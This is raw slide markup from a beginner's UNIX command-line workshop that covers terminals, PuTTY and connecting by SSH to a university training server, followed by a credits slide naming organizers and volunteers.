            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Don’t be scared of the command line. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>It only looks scary compared to GUIs, because you don’t know what to type yet!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="796016" y="4391038"/>
            <a:ext cx="7551967" cy="1267749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4120293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0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUIs and Command Lines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Not all command lines are equal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Windows uses DOS commands, which is not UNIX-based! (The stuff we teach you here won’t work)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1404938" y="4901087"/>
            <a:ext cx="6334125" cy="1343025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771650" y="3400896"/>
            <a:ext cx="5600700" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778054" y="3010053"/>
            <a:ext cx="3365345" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cygwin (UNIX) command prompt:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403304" y="4531755"/>
            <a:ext cx="3068789" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 7 command prompt:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="796100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Lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Opening a Terminal Session on a Mac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>On Mac:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Open: Applications &gt; Utilities &gt; Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Open Finder, search for “Terminal”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="http://blog.teamtreehouse.com/wp-content/uploads/2012/09/Screen-Shot-2012-09-25-at-12.57.00-PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6815" t="9708" r="7325" b="19958"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2660754" y="2907014"/>
            <a:ext cx="3822492" cy="1520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370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Lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>0.3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Opening a Terminal Session in Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="4042410" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>On Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Search for putty.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Run it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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4077325" y="2246274"/>
            <a:ext cx="3897443" cy="3719902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3124973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smtClean="0"/>
              <a:t>SSH is an encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>network protocol for communicating with a remote computer/server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We will use SSH today to communicate with a UNIX server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecureShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SSH)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190812" y="2688486"/>
            <a:ext cx="8762376" cy="1904362"/>
            <a:chOff x="190812" y="2606041"/>
            <a:chExt cx="8762376" cy="1904362"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Right Arrow 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1056807" y="3175678"/>
              <a:ext cx="6475251" cy="8769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descr="Image result for computer server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2058" y="2606041"/>
              <a:ext cx="1421130" cy="1904362"/>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img.clipartfest.com/04bed964c916ac933048f4aa6d9336f9_laptop-computer-clipart-free-clip-art-computer_6654-53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812" y="2835922"/>
              <a:ext cx="1813654" cy="144460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6641580" y="2795665"/>
              <a:ext cx="262328" cy="171473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0"/>
              <a:endCxn id="7" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3249118" y="2795665"/>
              <a:ext cx="352362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4"/>
              <a:endCxn id="7" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3249118" y="4510402"/>
              <a:ext cx="3523626"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49118" y="2795666"/>
              <a:ext cx="3523626" cy="17147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SSH Tunnel</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Oval 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3117954" y="2795666"/>
              <a:ext cx="262328" cy="1714737"/>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612036" y="3395283"/>
              <a:ext cx="749508" cy="4335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874788" y="3429474"/>
              <a:ext cx="1242648" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Commands</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3057327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0.5: Connecting to the Server with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a Mac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In terminal, type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;@training.las.iastate.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hit “Enter” key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348146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Lseson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connecting to the  Server with Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="3763468" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the “Host Name” box, type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;@training.las.iastate.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Leave the “Port” box alone, and make sure the “SSH” radio button is highlighted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Then hit “Open”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1825625"/>
            <a:ext cx="4410075" cy="4229100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4272197" y="2953062"/>
            <a:ext cx="1858780" cy="824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122295" y="3380283"/>
            <a:ext cx="3612630" cy="8169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540833" y="5508885"/>
            <a:ext cx="4609475" cy="3297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562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a:xfrm>
            <a:off x="628650" y="1675724"/>
            <a:ext cx="7886700" cy="5032375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Inspiration for slides from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Gokul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Wimalanathan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and Jennifer Chang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Organizers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ashish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Jain and Dan Kool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Funding/Support/Volunteers: BCBGSO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Tech support: Biology IT (Levi Baber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>many, MANY volunteers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Dan Kool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Ashish Jain	David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Hufnagel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Xiyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Peng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sagnik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Banerjee	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Akshay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Yadav	Schuyler Smith	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Urminder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Singh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Lindsay Rutter	Alvin Chon	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Avani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Khadilkar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Kumar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Ambuj</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Nancy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Machanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Cam Fay		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sayane</a:t>
            </a:r>
            <a:r>
